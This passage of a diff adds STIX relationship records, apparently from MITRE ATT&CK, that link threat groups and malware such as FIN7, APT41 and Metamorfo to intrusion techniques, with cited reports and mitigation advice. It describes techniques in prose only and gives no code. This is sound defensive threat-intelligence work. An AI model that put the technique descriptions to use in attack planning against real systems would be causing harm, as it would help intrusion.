+ "id": "relationship--99dfbbaa-5e58-4a03-9b94-fb6962681ce3",
+ "type": "relationship",
+ "modified": "2020-06-24T01:11:43.031Z",
+ "created": "2020-06-23T19:30:44.853Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dc6fe6ee-04c2-49be-ba3d-f38d2463c02a",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "source_name": "Talos Cobalt Group July 2018",
+ "description": "Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.",
+ "url": "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html"
+ },
+ {
+ "source_name": "PTSecurity Cobalt Group Aug 2017",
+ "description": "Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.",
+ "url": "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf"
+ },
+ {
+ "source_name": "Group IB Cobalt Aug 2017",
+ "description": "Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.",
+ "url": "https://www.group-ib.com/blog/cobalt"
+ },
+ {
+ "description": "Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.",
+ "url": "https://blog.morphisec.com/cobalt-gang-2.0",
+ "source_name": "Morphisec Cobalt Gang Oct 2018"
+ },
+ {
+ "source_name": "Unit 42 Cobalt Gang Oct 2018",
+ "url": "https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/",
+ "description": "Unit 42. (2018, October 25). New Techniques to Uncover and Attribute Financial actors Commodity Builders and Infrastructure Revealed. Retrieved December 11, 2018."
+ },
+ {
+ "description": "Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
+ "source_name": "TrendMicro Cobalt Group Nov 2017"
+ }
+ ],
+ "description": "[Cobalt Group](https://attack.mitre.org/groups/G0080) has executed JavaScript scriptlets on the victim's machine.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--8e8bebc7-14ff-4c84-a2a4-472446c5897a",
+ "type": "relationship",
+ "modified": "2020-06-23T19:41:51.743Z",
+ "created": "2020-06-23T19:41:51.743Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
+ "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.",
+ "source_name": "FireEye FIN7 Aug 2018"
+ },
+ {
+ "source_name": "Flashpoint FIN 7 March 2019",
+ "url": "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/",
+ "description": "Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019."
+ },
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
+ "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.",
+ "source_name": "FireEye FIN7 Aug 2018"
+ }
+ ],
+ "description": "[FIN7](https://attack.mitre.org/groups/G0046) used JavaScript scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--72b1c4ab-81ca-47a4-a541-ceb44580c87b",
+ "type": "relationship",
+ "modified": "2020-06-24T19:03:20.236Z",
+ "created": "2020-06-23T19:53:58.405Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built on .NET, on target machines.(Citation: Kaspersky MoleRATs April 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--7321f0a3-afab-462b-808d-ac85978a9b0c",
+ "type": "relationship",
+ "modified": "2020-06-24T19:11:10.751Z",
+ "created": "2020-06-23T20:00:58.628Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
+ "target_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--d2468213-1073-43d0-bd10-020b23597a6f",
+ "type": "relationship",
+ "modified": "2020-06-23T22:28:28.085Z",
+ "created": "2020-06-23T22:28:28.085Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--787fb64d-c87b-4ee5-a341-0ef17ec4c15c",
+ "target_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
+ "relationship_type": "mitigates",
+ "description": "[Environmental Keying](https://attack.mitre.org/techniques/T1480/001) likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.",
+ "id": "relationship--9a513f75-f09b-4840-8654-521fa4ff59fa",
+ "type": "relationship",
+ "modified": "2020-06-24T18:52:12.858Z",
+ "created": "2020-06-23T22:35:10.751Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d",
+ "target_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441",
+ "external_references": [
+ {
+ "source_name": "FireEye Outlook Dec 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html",
+ "description": "McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020."
+ }
+ ],
+ "description": "[OilRig](https://attack.mitre.org/groups/G0049) has abused the Outlook Home Page feature for persistence. [OilRig](https://attack.mitre.org/groups/G0049) has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.(Citation: FireEye Outlook Dec 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3c367277-6168-4df8-b982-e9949994123d",
+ "type": "relationship",
+ "modified": "2020-06-24T00:26:37.174Z",
+ "created": "2020-06-24T00:26:37.174Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
+ "external_references": [
+ {
+ "source_name": "Twitter ItsReallyNick APT41 EK",
+ "url": "https://twitter.com/ItsReallyNick/status/1189622925286084609",
+ "description": "Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. [APT41](https://attack.mitre.org/groups/G0096) has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.(Citation: Twitter ItsReallyNick APT41 EK)",
+ "relationship_type": "uses",
+ "id": "relationship--5212a108-111b-4467-84c9-933d2b84aad2",
+ "type": "relationship",
+ "modified": "2020-06-24T00:51:25.879Z",
+ "created": "2020-06-24T00:51:25.879Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--987988f0-cf86-4680-a875-2f6456ab2448",
+ "target_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "relationship_type": "mitigates",
+ "description": "Restrict access to the authorized_keys file.",
+ "id": "relationship--3bc431bd-f093-4daf-b264-e73f1fcf591a",
+ "type": "relationship",
+ "modified": "2020-06-25T16:32:23.561Z",
+ "created": "2020-06-24T12:42:35.446Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31",
+ "target_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "relationship_type": "mitigates",
+ "description": "Disable SSH if it is not necessary on a host or restrict SSH access for specific users/groups using /etc/ssh/sshd_config.",
+ "id": "relationship--8faa230d-ced2-4289-81c5-554fd6dc62fd",
+ "type": "relationship",
+ "modified": "2020-06-25T16:32:23.591Z",
+ "created": "2020-06-24T12:42:35.454Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--8b86fa49-6d13-42b4-bd48-814abfd6793f",
+ "type": "relationship",
+ "modified": "2020-06-24T12:42:35.464Z",
+ "created": "2020-06-24T12:42:35.464Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to add the public key of its handlers to the authorized_keys file to maintain persistence on an infected host.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--13d595d2-9497-4bbe-be74-6e2a3a4dde06",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.164Z",
+ "created": "2020-06-24T13:16:30.364Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aba32ee8-9eca-45fa-99f3-89e75dbc16a6",
+ "type": "relationship",
+ "modified": "2020-06-24T15:33:08.153Z",
+ "created": "2020-06-24T15:33:08.153Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3811b12a-fcfc-47d2-83ec-89df60ca4c21",
+ "type": "relationship",
+ "modified": "2020-06-24T15:36:00.917Z",
+ "created": "2020-06-24T15:36:00.917Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+ "target_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c",
+ "relationship_type": "mitigates",
+ "description": "Ensure least privilege principles are applied to Identity and Access Management (IAM) security policies.(Citation: Expel IO Evil in AWS)",
+ "id": "relationship--b29139fc-f053-44f7-9b5f-6029a984474d",
+ "external_references": [
+ {
+ "source_name": "Expel IO Evil in AWS",
+ "url": "https://expel.io/blog/finding-evil-in-aws/",
+ "description": "Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020."
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-07-07T13:49:05.463Z",
+ "created": "2020-06-24T16:55:46.379Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
+ "target_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c",
+ "relationship_type": "mitigates",
+ "description": "Routinely check account role permissions to ensure only expected users and roles have permission to modify cloud firewalls. ",
+ "id": "relationship--9bb5eb8e-b05c-4890-a5aa-6c038b61d5d7",
+ "type": "relationship",
+ "modified": "2020-07-07T13:49:05.492Z",
+ "created": "2020-06-24T16:55:46.394Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c",
+ "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--dfc19325-9b8a-4cb7-80fc-dedc2cf8742a",
+ "type": "relationship",
+ "modified": "2020-06-24T16:55:46.408Z",
+ "created": "2020-06-24T16:55:46.408Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) can extract backdoor malware from downloaded images.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c748a743-6d63-4287-a86a-d799e14fcd99",
+ "type": "relationship",
+ "modified": "2020-06-24T17:41:52.664Z",
+ "created": "2020-06-24T17:41:52.664Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) can extract malware from a downloaded JPEG.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5342c0fb-0f4d-456a-a7e7-525c60b7f82e",
+ "type": "relationship",
+ "modified": "2020-06-24T17:45:50.049Z",
+ "created": "2020-06-24T17:45:50.049Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has disguised an MSI file as the Adobe Acrobat Reader Installer.(Citation: Medium Metamorfo Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d6829fd4-7c9b-495f-9689-d1be1939f99e",
+ "type": "relationship",
+ "modified": "2020-06-24T18:16:36.574Z",
+ "created": "2020-06-24T18:16:36.574Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "Upon execution, [Metamorfo](https://attack.mitre.org/software/S0455) has unzipped itself after being downloaded to the system.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--f264330f-3c9f-4a2a-a6f6-904a9139bbf5",
+ "type": "relationship",
+ "modified": "2020-06-24T19:26:00.547Z",
+ "created": "2020-06-24T19:26:00.547Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used native WINAPI calls.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--3c132a1b-053d-450b-8a4f-cabf30317075",
+ "type": "relationship",
+ "modified": "2020-06-24T19:58:56.859Z",
+ "created": "2020-06-24T19:58:56.859Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has hidden its GUI using the ShowWindow() WINAPI call.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--ef934eda-a3ad-40fb-8923-fc2f72fb8f6e",
+ "type": "relationship",
+ "modified": "2020-06-24T19:58:56.888Z",
+ "created": "2020-06-24T19:58:56.888Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) can download and execute additional payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--197ade21-6787-4ed3-a3ce-ff4b59b2f15c",
+ "type": "relationship",
+ "modified": "2020-06-24T20:29:46.153Z",
+ "created": "2020-06-24T20:29:46.153Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has hidden malicious payloads in %USERPROFILE%\\Adobe\\Driver\\dwg\\ and mimicked the legitimate DHCP service binary.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ebf39235-749f-400e-aeb9-185df9e43fe1",
+ "type": "relationship",
+ "modified": "2020-06-29T15:22:59.271Z",
+ "created": "2020-06-24T20:43:18.213Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--fc787de3-8a82-43f6-b649-f01a7006be54",
+ "type": "relationship",
+ "modified": "2020-06-24T22:30:55.923Z",
+ "created": "2020-06-24T22:30:55.923Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+ "target_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "relationship_type": "mitigates",
+ "description": "Limit the privileges of user accounts so that only authorized administrators can edit system environment variables.",
+ "id": "relationship--fd47b0c7-e1d9-4e6d-8081-4e56ecb1ad03",
+ "type": "relationship",
+ "modified": "2020-06-26T16:09:59.148Z",
+ "created": "2020-06-24T22:37:51.030Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
+ "target_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "relationship_type": "mitigates",
+ "description": "Identify and block potentially malicious unmanaged COR_PROFILER profiling DLLs by using application control solutions like AppLocker that are capable of auditing and/or blocking unapproved DLLs.(Citation: Beechey 2010)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)",
+ "id": "relationship--caf19942-8346-447f-9781-28a0b858c43f",
+ "external_references": [
+ {
+ "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599",
+ "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.",
+ "source_name": "Beechey 2010"
+ },
+ {
+ "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
+ "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.",
+ "source_name": "Windows Commands JPCERT"
+ },
+ {
+ "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
+ "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.",
+ "source_name": "NSA MS AppLocker"
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-26T16:09:59.180Z",
